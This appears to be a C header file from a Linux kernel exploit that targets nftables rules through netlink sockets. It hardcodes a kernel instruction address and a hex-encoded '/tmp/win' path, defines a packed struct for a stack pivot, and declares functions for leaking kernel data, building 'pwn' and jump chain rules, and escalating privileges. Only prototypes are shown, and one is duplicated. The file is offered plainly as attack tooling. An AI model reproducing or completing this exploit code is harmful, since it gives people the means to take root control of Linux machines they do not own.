25 lines
1.3 KiB
C
25 lines
1.3 KiB
C
#pragma once
|
|
#include <stdint.h>
|
|
#include <sys/socket.h>
|
|
#define TMP_WINDPROBE 0x6e69772f706d742f
|
|
#define INSTR_BASE 0xffffffff81c2cfa1
|
|
|
|
#pragma pack(push,1)
|
|
struct jumpstack_t {
|
|
unsigned char init;
|
|
unsigned long rule;
|
|
unsigned long last_rule;
|
|
unsigned long eval;
|
|
unsigned long pivot;
|
|
unsigned char pad[31];
|
|
};
|
|
#pragma pack(pop)
|
|
|
|
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
|
|
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
|
|
int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
|
|
int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len);
|
|
int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
|
|
int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr);
|
|
int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr);
|
|
int privesc(); |